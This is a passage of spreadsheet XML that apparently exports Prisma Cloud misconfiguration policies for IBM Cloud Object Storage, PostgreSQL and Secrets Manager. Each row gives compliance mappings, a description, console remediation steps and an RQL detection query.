      </c>
      <c r="AI3339" t="inlineStr">
        <is>
          <t>1a4a486f-b804-4963-9736-1e90a3f7e8f6</t>
        </is>
      </c>
      <c r="AJ3339" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3339" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3340">
      <c r="A3340" t="inlineStr">
        <is>
          <t>CIS v1.1.0 (IBM Cloud) Level 1, CSA CCM v4.0.12, Insurance Regulatory And Development Authority Of India, Microsoft Cloud Security Benchmark v1, SOC 2, Microsoft Cloud Security Benchmark v1</t>
        </is>
      </c>
      <c r="B3340" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C3340" s="2" t="inlineStr"/>
      <c r="D3340" t="inlineStr"/>
      <c r="E3340" t="inlineStr"/>
      <c r="F3340" t="inlineStr"/>
      <c r="G3340" t="b">
        <v>1</v>
      </c>
      <c r="H334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0" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="J3340" t="inlineStr">
        <is>
          <t>ibm-object-storage</t>
        </is>
      </c>
      <c r="K3340" t="inlineStr">
        <is>
          <t>IBM Cloud Object Storage bucket is not restricted to Private IP ranges</t>
        </is>
      </c>
      <c r="L3340" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M3340" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N3340" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3340" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P3340" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q3340" t="inlineStr">
        <is>
          <t>NS</t>
        </is>
      </c>
      <c r="R3340" t="inlineStr">
        <is>
          <t>NS-2</t>
        </is>
      </c>
      <c r="S3340" t="inlineStr"/>
      <c r="T3340" t="b">
        <v>0</v>
      </c>
      <c r="U3340" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3340" t="inlineStr">
        <is>
          <t>ibm-object-storage-bucket</t>
        </is>
      </c>
      <c r="W3340" t="inlineStr">
        <is>
          <t>This policy identifies IBM Cloud object storage buckets that are not restricted to private IP ranges or if the cloud object storage firewall is not configured.
IBM Cloud Storage Firewall enables users to control access to their stored data by setting up firewall rules and restricting access to authorised IP addresses or ranges, thereby enhancing security and compliance with regulatory standards. Not restricting access via the IBM Cloud Storage Firewall to private IPs increases the risk of unauthorised data access, breaches, and potential compliance violations.
It is recommended to add only private IPs to the list of authorised IPs / ranges in bucket firewall policies.</t>
        </is>
      </c>
      <c r="X3340" t="inlineStr">
        <is>
          <t>To set a list of authorised IP addresses or remove the public IP from the IBM cloud object storage,
1. Log in to the IBM Cloud Console
2. Click on the menu icon and navigate to 'Resource list'. From the list of resources, select the object storage instance in which the reported bucket resides
3. Select the bucket to which you want to limit access to authorised IP addresses
4. Select the 'Firewall (legacy)' dropdown under the 'Permissions' tab
6. Click on 'Edit' and Click on 'Add' and specify a list of IP addresses from the IBM cloud private IP range in CIDR notation, for example.
192.168.0.0/16, fe80:021b::0/64. Addresses can follow either IPv4 or IPv6 standards
7. Click 'Add', or click on the public IP address presented in the IP address tab, and then click 'Delete'
8. Click 'Save All' to enforce the firewall</t>
        </is>
      </c>
      <c r="Y3340" t="inlineStr"/>
      <c r="Z3340" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'ibm' AND api.name = 'ibm-object-storage-bucket' AND json.rule = (firewall does not exist or (firewall exists and _IPAddress.areAnyOutsideCIDRRange(firewall.allowed_ip,192.168.0.0/16,172.16.0.0/12,10.0.0.0/8) is true))</t>
        </is>
      </c>
      <c r="AA3340" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3340" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC3340" t="inlineStr">
        <is>
          <t>PC-IBM-IBJ-1158</t>
        </is>
      </c>
      <c r="AD3340" t="b">
        <v>1</v>
      </c>
      <c r="AE3340" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3340" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG334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0" t="inlineStr">
        <is>
          <t>6a4db85b-34b5-4841-b8e6-f0e60194bde0</t>
        </is>
      </c>
      <c r="AI3340" t="inlineStr">
        <is>
          <t>57ffde9b-a2da-44ec-9b43-bf6b97bccb36</t>
        </is>
      </c>
      <c r="AJ3340" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3340" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3341">
      <c r="A3341" t="inlineStr">
        <is>
          <t>ITSG-33, Insurance Regulatory And Development Authority Of India, TX-RAMP Level 1, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), HITRUST CSF v.11.2.0, Microsoft Cloud Security Benchmark v1, CSA CCM v4.0.12, TX-RAMP Level 1, TX-RAMP Level 2, ITSG-33, NYDFS 23 CRR-NY 500.0, Microsoft Cloud Security Benchmark v1, NIST 800-53 Rev 5, ITSG-33, TX-RAMP Level 1, NYDFS 23 CRR-NY 500.0, HIPAA, Secure Controls Framework (SCF) - 2024.2, TX-RAMP Level 2, CSA CCM v4.0.12, TX-RAMP Level 2</t>
        </is>
      </c>
      <c r="B3341" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C3341" s="2" t="inlineStr"/>
      <c r="D3341" t="inlineStr"/>
      <c r="E3341" t="inlineStr"/>
      <c r="F3341" t="inlineStr"/>
      <c r="G3341" t="b">
        <v>0</v>
      </c>
      <c r="H334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1" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="J3341" t="inlineStr">
        <is>
          <t>ibm-object-storage</t>
        </is>
      </c>
      <c r="K3341" t="inlineStr">
        <is>
          <t>IBM Cloud Object Storage bucket is not enabled with IBM Cloud Monitoring</t>
        </is>
      </c>
      <c r="L3341" t="inlineStr"/>
      <c r="M3341" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N3341" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3341" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P3341" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q3341" t="inlineStr">
        <is>
          <t>IR</t>
        </is>
      </c>
      <c r="R3341" t="inlineStr">
        <is>
          <t>IR-05-00 : Incident Monitoring</t>
        </is>
      </c>
      <c r="S3341" t="inlineStr"/>
      <c r="T3341" t="b">
        <v>0</v>
      </c>
      <c r="U3341" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3341" t="inlineStr">
        <is>
          <t>ibm-object-storage-bucket</t>
        </is>
      </c>
      <c r="W3341" t="inlineStr">
        <is>
          <t>This policy identifies IBM Cloud Object Storage buckets which have Monitoring disabled or not enabled properly. Use IBM Cloud Monitoring to gain operational visibility into the performance and health of your applications, services, and platforms. So, it is recommended to enable Monitoring to monitor all usage/request metrics of a bucket.</t>
        </is>
      </c>
      <c r="X3341" t="inlineStr">
        <is>
          <t>1. Log in to the IBM Cloud Console
2. Click on Menu Icon and navigate to 'Resource list'. From the list of resources, select the object storage instance in which the reported bucket resides.
3. Select the bucket and click on 'Configuration' tab.
4. Navigate to 'Monitoring', click on 'Create' button if it is not enabled already.
5. If already enabled, click on three dots and click 'Edit'.
6. Select 'Usage Metrics' and 'Request Metrics' checkboxes to get all metrics.
7. Click on 'Save'.</t>
        </is>
      </c>
      <c r="Y3341" t="inlineStr"/>
      <c r="Z3341" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'ibm' AND api.name = 'ibm-object-storage-bucket' AND json.rule = metrics_monitoring does not exist or metrics_monitoring.request_metrics_enabled does not equal ignore case "true" or metrics_monitoring.usage_metrics_enabled does not equal ignore case "true"</t>
        </is>
      </c>
      <c r="AA3341" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3341" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC3341" t="inlineStr">
        <is>
          <t>PC-IBM-IBJ-1003</t>
        </is>
      </c>
      <c r="AD3341" t="b">
        <v>1</v>
      </c>
      <c r="AE3341" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3341" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG334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1" t="inlineStr">
        <is>
          <t>055e8358-c191-4318-9b78-3e2453aee096</t>
        </is>
      </c>
      <c r="AI3341" t="inlineStr">
        <is>
          <t>1f2e5afd-10ab-439a-93a1-55df227be773</t>
        </is>
      </c>
      <c r="AJ3341" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3341" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3342">
      <c r="A3342" t="inlineStr">
        <is>
          <t>MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, HITRUST CSF v.11.2.0, TX-RAMP Level 2, ITSG-33, TX-RAMP Level 2, Insurance Regulatory And Development Authority Of India, Telecommunications Security Act - TSA, SOC 2, NYDFS 23 CRR-NY 500.0, CIS v1.1.0 (IBM Cloud) Level 1</t>
        </is>
      </c>
      <c r="B3342" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C3342" s="2" t="inlineStr"/>
      <c r="D3342" t="inlineStr"/>
      <c r="E3342" t="inlineStr"/>
      <c r="F3342" t="inlineStr"/>
      <c r="G3342" t="b">
        <v>1</v>
      </c>
      <c r="H334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2" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="J3342" t="inlineStr">
        <is>
          <t>ibm-postgresql</t>
        </is>
      </c>
      <c r="K3342" t="inlineStr">
        <is>
          <t>IBM Cloud Database PostgreSQL is exposed to public</t>
        </is>
      </c>
      <c r="L3342" t="inlineStr"/>
      <c r="M3342" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N3342" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3342" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P3342" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q3342" t="inlineStr">
        <is>
          <t>IBM Cloud Databases Family</t>
        </is>
      </c>
      <c r="R3342" t="inlineStr">
        <is>
          <t>4.3</t>
        </is>
      </c>
      <c r="S3342" t="inlineStr"/>
      <c r="T3342" t="b">
        <v>0</v>
      </c>
      <c r="U3342" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3342" t="inlineStr">
        <is>
          <t>ibm-postgresql-deployment-info</t>
        </is>
      </c>
      <c r="W3342" t="inlineStr">
        <is>
          <t>The policy identifies IBM Cloud Database PostgreSQL instances exposed to the public via public endpoints. When provisioning an IBM Cloud database service, it is generally not recommended to use public endpoints because it can pose a security risk. Public endpoints can make your database accessible to anyone with internet access, potentially leaving your data vulnerable to unauthorized access or malicious attacks. Instead, it is recommended to use private endpoints when provisioning a database service in IBM Cloud.</t>
        </is>
      </c>
      <c r="X3342" t="inlineStr">
        <is>
          <t>Refer to the IBM documentation to change the service endpoints from public to private
https://cloud.ibm.com/docs/cloud-databases?topic=cloud-databases-service-endpoints</t>
        </is>
      </c>
      <c r="Y3342" t="inlineStr"/>
      <c r="Z3342" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'ibm' AND api.name = 'ibm-postgresql-deployment-info' AND json.rule = deployment.enable_public_endpoints is true</t>
        </is>
      </c>
      <c r="AA3342" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3342" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC3342" t="inlineStr">
        <is>
          <t>PC-IBM-IPSQ-995</t>
        </is>
      </c>
      <c r="AD3342" t="b">
        <v>1</v>
      </c>
      <c r="AE3342" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3342" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG334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2" t="inlineStr">
        <is>
          <t>dc5d519d-20b6-4f93-9c69-9bdbf47185c4</t>
        </is>
      </c>
      <c r="AI3342" t="inlineStr">
        <is>
          <t>338d4f38-99c6-470d-bd92-f0411086b482</t>
        </is>
      </c>
      <c r="AJ3342" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3342" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3343">
      <c r="A3343" t="inlineStr">
        <is>
          <t>Insurance Regulatory And Development Authority Of India</t>
        </is>
      </c>
      <c r="B3343" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C3343" s="2" t="inlineStr"/>
      <c r="D3343" t="inlineStr"/>
      <c r="E3343" t="inlineStr"/>
      <c r="F3343" t="inlineStr"/>
      <c r="G3343" t="b">
        <v>1</v>
      </c>
      <c r="H334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3" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="J3343" t="inlineStr">
        <is>
          <t>ibm-postgresql</t>
        </is>
      </c>
      <c r="K3343" t="inlineStr">
        <is>
          <t>IBM Cloud PostgreSQL Database network access is not restricted to a specific IP range</t>
        </is>
      </c>
      <c r="L3343" t="inlineStr"/>
      <c r="M3343" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N3343" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3343" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P3343" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q3343" t="inlineStr">
        <is>
          <t>Security Domain Policies</t>
        </is>
      </c>
      <c r="R3343" t="inlineStr">
        <is>
          <t>Network Security</t>
        </is>
      </c>
      <c r="S3343" t="inlineStr"/>
      <c r="T3343" t="b">
        <v>0</v>
      </c>
      <c r="U3343" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3343" t="inlineStr">
        <is>
          <t>ibm-postgresql-deployment-info</t>
        </is>
      </c>
      <c r="W3343" t="inlineStr">
        <is>
          <t>This policy identifies IBM Cloud PostgreSQL Databases with no specified IP range for network access. To restrict access to your databases, you can allowlist specific IP addresses or ranges of IP addresses on your deployment. When no IP addresses are in the allowlist, the allowlist is disabled and the deployment accepts connections from any IP address. It is recommended to create an allowlist, only IP addresses that match the allowlist or are in the range of IP addresses in the allowlist can connect to your deployment.</t>
        </is>
      </c>
      <c r="X3343" t="inlineStr">
        <is>
          <t>1. Log in to the IBM Cloud Console
2. Click on 'Menu Icon' and navigate to 'Resource list', from the list of resources select PostgreSQL database reported in the alert.
3. Refer below URL for setting allowlist IP addresses : 
https://cloud.ibm.com/docs/cloud-databases?topic=cloud-databases-allowlisting&amp;interface=ui#set-allowlist-ui
4. Please remove IP address starting with '0.0.0.0' if any added already in the allow list and make sure to add IP address other than '0.0.0.0'.</t>
        </is>
      </c>
      <c r="Y3343" t="inlineStr"/>
      <c r="Z3343" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'ibm' AND api.name = 'ibm-postgresql-deployment-info' AND json.rule = allowedListIPAddresses[*] size equals 0 or allowedListIPAddresses[?any( address equals 0.0.0.0/0 )] exists</t>
        </is>
      </c>
      <c r="AA3343" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3343" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC3343" t="inlineStr">
        <is>
          <t>PC-IBM-IPSQ-999</t>
        </is>
      </c>
      <c r="AD3343" t="b">
        <v>1</v>
      </c>
      <c r="AE3343" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3343" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG334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3" t="inlineStr">
        <is>
          <t>08e2033c-7d82-40e5-8406-760085fd8c23</t>
        </is>
      </c>
      <c r="AI3343" t="inlineStr">
        <is>
          <t>7a214e1a-6d78-491a-9cbb-a539a1c07772</t>
        </is>
      </c>
      <c r="AJ3343" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3343" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3344">
      <c r="A3344" t="inlineStr">
        <is>
          <t>HIPAA, CSA CCM v4.0.12, ISO/IEC 27001:2022, ISO/IEC 27001:2022, NYDFS 23 CRR-NY 500.0, HITRUST CSF v.11.2.0, Microsoft Cloud Security Benchmark v1, DORA, Insurance Regulatory And Development Authority Of India, SOC 2, HIPAA, NYDFS 23 CRR-NY 500.0, CIS v1.1.0 (IBM Cloud) Level 1, NIST 800-53 Rev 5</t>
        </is>
      </c>
      <c r="B3344" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C3344" s="2" t="inlineStr"/>
      <c r="D3344" t="inlineStr"/>
      <c r="E3344" t="inlineStr"/>
      <c r="F3344" t="inlineStr"/>
      <c r="G3344" t="b">
        <v>0</v>
      </c>
      <c r="H334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4" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="J3344" t="inlineStr">
        <is>
          <t>ibm-postgresql</t>
        </is>
      </c>
      <c r="K3344" t="inlineStr">
        <is>
          <t>IBM Cloud PostgreSQL Database disk encryption is not enabled with customer managed keys</t>
        </is>
      </c>
      <c r="L3344" t="inlineStr"/>
      <c r="M3344" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N3344" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3344" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P3344" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q3344" t="inlineStr">
        <is>
          <t>SC</t>
        </is>
      </c>
      <c r="R3344" t="inlineStr">
        <is>
          <t>Cryptographic Key Establishment and Management</t>
        </is>
      </c>
      <c r="S3344" t="inlineStr"/>
      <c r="T3344" t="b">
        <v>0</v>
      </c>
      <c r="U3344" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3344" t="inlineStr">
        <is>
          <t>ibm-postgresql-deployment-info</t>
        </is>
      </c>
      <c r="W3344" t="inlineStr">
        <is>
          <t>This policy identifies IBM Cloud PostgreSQL Databases with default disk encryption. Using customer managed keys will increase significant control where keys are managed by customers. It is recommended to use customer managed keys for disk encryption which provides customer control over the lifecycle of the keys.</t>
        </is>
      </c>
      <c r="X3344" t="inlineStr">
        <is>
          <t>PostgreSQL database disk encryption can be enabled with Customer managed keys only at the time of
creation.
Please use below link to provide PostgreSQL service to KMS service authorization if not authorized already;
https://cloud.ibm.com/docs/cloud-databases?topic=cloud-databases-key-protect&amp;interface=ui#granting-service-auth
Please use below link to provision a KMS instance with a key to use for encryption if not provisioned:
https://cloud.ibm.com/docs/key-protect?topic=key-protect-getting-started-tutorial#create-keys
Please follow below steps to create a new PostgreSQL deployment from backup of vulnerable PostgreSQL deployment:
1. Log in to the IBM Cloud Console
2. Click on 'Menu Icon' and navigate to 'Resource list', from the list of resources select PostgreSQL database reported in the alert.
3. In the left navigation pane, navigate to 'Backups and restore', under 'Available Backups' section click on 'Create backup' to get latest backup of the database.
4. Under 'Available Backups' tab, click on three dots on the right corner of a row containing latest backup and click on 'Restore backup'.
5. On create a new Database for PostgreSQL from backup page, select all the configuration as per the requirement.
6. Under 'Encryption' section, under 'KMS Instance' please select a KMS instance and a key from the instance to use for encryption.
7. Click on 'Restore backup'.
Please follow below steps to delete the reported database deployment :
1. Log in to the IBM Cloud Console
2. Click on 'Menu Icon' and navigate to 'Resource list'.
3. Select your deployment. Next, by using the stacked three-dot menu icon , choose Delete from the drop list.</t>
        </is>
      </c>
      <c r="Y3344" t="inlineStr"/>
      <c r="Z3344" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'ibm' AND api.name = 'ibm-postgresql-deployment-info' AND json.rule = deployment.platform_options.disk_encryption_key_crn is empty</t>
        </is>
      </c>
      <c r="AA3344" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3344" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC3344" t="inlineStr">
        <is>
          <t>PC-IBM-IPSQ-998</t>
        </is>
      </c>
      <c r="AD3344" t="b">
        <v>1</v>
      </c>
      <c r="AE3344" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3344" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG334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4" t="inlineStr">
        <is>
          <t>4409ea07-a084-48fc-919c-23d7757ed1ef</t>
        </is>
      </c>
      <c r="AI3344" t="inlineStr">
        <is>
          <t>d9363df8-2f9d-42e7-a2e9-89264f7110c7</t>
        </is>
      </c>
      <c r="AJ3344" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3344" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3345">
      <c r="A3345" t="inlineStr">
        <is>
          <t>CIS v1.1.0 (IBM Cloud) Level 1, Microsoft Cloud Security Benchmark v1, Insurance Regulatory And Development Authority Of India, CSA CCM v4.0.12, GDPR, NIST 800-53 Rev 5</t>
        </is>
      </c>
      <c r="B3345" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C3345" s="2" t="inlineStr"/>
      <c r="D3345" t="inlineStr"/>
      <c r="E3345" t="inlineStr"/>
      <c r="F3345" t="inlineStr"/>
      <c r="G3345" t="b">
        <v>1</v>
      </c>
      <c r="H334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5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="J3345" t="inlineStr">
        <is>
          <t>ibm-secret</t>
        </is>
      </c>
      <c r="K3345" t="inlineStr">
        <is>
          <t>IBM Cloud Secrets Manager certificate not configured with automatic rotation</t>
        </is>
      </c>
      <c r="L3345" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M3345" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N3345" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3345" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P3345" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q3345" t="inlineStr">
        <is>
          <t>IA</t>
        </is>
      </c>
      <c r="R3345" t="inlineStr">
        <is>
          <t>Authenticator Management | Public Key-based Authentication</t>
        </is>
      </c>
      <c r="S3345" t="inlineStr"/>
      <c r="T3345" t="b">
        <v>0</v>
      </c>
      <c r="U3345" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3345" t="inlineStr">
        <is>
          <t>ibm-secret-manager-secret</t>
        </is>
      </c>
      <c r="W3345" t="inlineStr">
        <is>
          <t>This policy identifies IBM Cloud Secrets Manager certificates that are not configured with automatic rotation.
IBM Cloud Secrets Manager allows you to manage various types of certificates, including those from imported third-party certificate authorities, public certificates, and private certificates, providing a centralised platform for secure certificate storage and management. Securely storing and timely rotating certificates before expiration is crucial for maintaining a high security posture and avoiding any service disruptions.
It is recommended to set IBM Cloud Secrets Manager certificates with auto-rotation.</t>
        </is>
      </c>
      <c r="X3345" t="inlineStr">
        <is>
          <t>To set a rotation policy for a certificate, follow the below steps:
1. Log in to the IBM Cloud Console
2. Click on the menu icon and navigate to 'Resource list', From the list of resources, select the secret manager instance in which the reported secret resides under the security section.
3. Select the secret.
4. Under the 'Rotation' tab, enable 'Automatic secret rotation'.
5. Set 'Rotation Interval' according to the requirements.
6. Click on 'Update'.
Note: Imported certificates cannot be set with an automatic rotation policy; they have to be re-imported before expiration.</t>
        </is>
      </c>
      <c r="Y3345" t="inlineStr"/>
      <c r="Z3345" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'ibm' AND api.name = 'ibm-secret-manager-secret' AND json.rule = state_description equal ignore case active and secret_type is member of (private_cert, public_cert) and rotation.auto_rotate is false</t>
        </is>
      </c>
      <c r="AA3345" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3345" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC3345" t="inlineStr">
        <is>
          <t>PC-IBM-ISM-1190</t>
        </is>
      </c>
      <c r="AD3345" t="b">
        <v>1</v>
      </c>
      <c r="AE3345" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3345" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG334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5" t="inlineStr">
        <is>
          <t>886b1e46-a3ee-4c9c-990d-c8b23faefd6a</t>
        </is>
      </c>
      <c r="AI3345" t="inlineStr">
        <is>
          <t>31a7dbc6-7b17-49a7-9deb-c675b9773b24</t>
        </is>
      </c>
      <c r="AJ3345" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3345" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3346">
      <c r="A3346" t="inlineStr">
        <is>
          <t>Microsoft Cloud Security Benchmark v1, CSA CCM v4.0.12, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, TX-RAMP Level 2, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, Insurance Regulatory And Development Authority Of India, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, Australian Cyber Security Centre (ACSC) Essential Eight - Level 3, Australian Cyber Security Centre (ACSC) Essential Eight - Level 2, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, HITRUST CSF v.11.2.0, ITSG-33, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise</t>
        </is>
      </c>
      <c r="B3346" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C3346" s="2" t="inlineStr"/>
      <c r="D3346" t="inlineStr"/>
      <c r="E3346" t="inlineStr"/>
      <c r="F3346" t="inlineStr"/>
      <c r="G3346" t="b">
        <v>0</v>
      </c>
      <c r="H334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6" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="J3346" t="inlineStr">
        <is>
          <t>ibm-secret</t>
        </is>
      </c>
      <c r="K3346" t="inlineStr">
        <is>
          <t>IBM Cloud Secrets Manager arbitrary secrets have aged more than 90 days without being rotated</t>
        </is>
      </c>
      <c r="L3346" t="inlineStr"/>
      <c r="M3346" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N3346" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3346" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P3346" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q3346" t="inlineStr">
        <is>
          <t>TA0005</t>
        </is>
      </c>
      <c r="R3346" t="inlineStr">
        <is>
          <t>T1078 - Valid Accounts (TA0003) (TA0005)</t>
        </is>
      </c>
      <c r="S3346" t="inlineStr"/>
      <c r="T3346" t="b">
        <v>0</v>
      </c>
      <c r="U3346" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3346" t="inlineStr">
        <is>
          <t>ibm-secret-manager-secret</t>
        </is>
      </c>
      <c r="W3346" t="inlineStr">
        <is>
          <t>This policy identifies IBM Cloud Secrets Manager arbitrary secrets that have aged more than 90 days without being rotated. Arbitrary secrets should be rotated to ensure that data cannot be accessed with an old secret which might have been lost, cracked, or stolen. It is recommended that all arbitrary secrets are regularly rotated.</t>
        </is>
      </c>
      <c r="X3346" t="inlineStr">
        <is>
          <t>1. Log in to the IBM Cloud Console
2. Click on Menu Icon and navigate to 'Resource list'. From the list of resources, select the secret manager instance in which the reported secret resides, under security section.
3. Select the secret and click on 'Actions' dropdown.
4. Select 'Rotate' from the dropdown.
5. In the 'Rotate secret' screen, provide data as required.
6. Click on 'Rotate'.</t>
        </is>
      </c>
      <c r="Y3346" t="inlineStr"/>
      <c r="Z3346" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'ibm' AND api.name = 'ibm-secret-manager-secret' AND json.rule = 'secret_type equals arbitrary and state_description equal ignore case active and (_DateTime.ageInDays(last_update_date) &gt; 90)'</t>
        </is>
      </c>
      <c r="AA3346" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
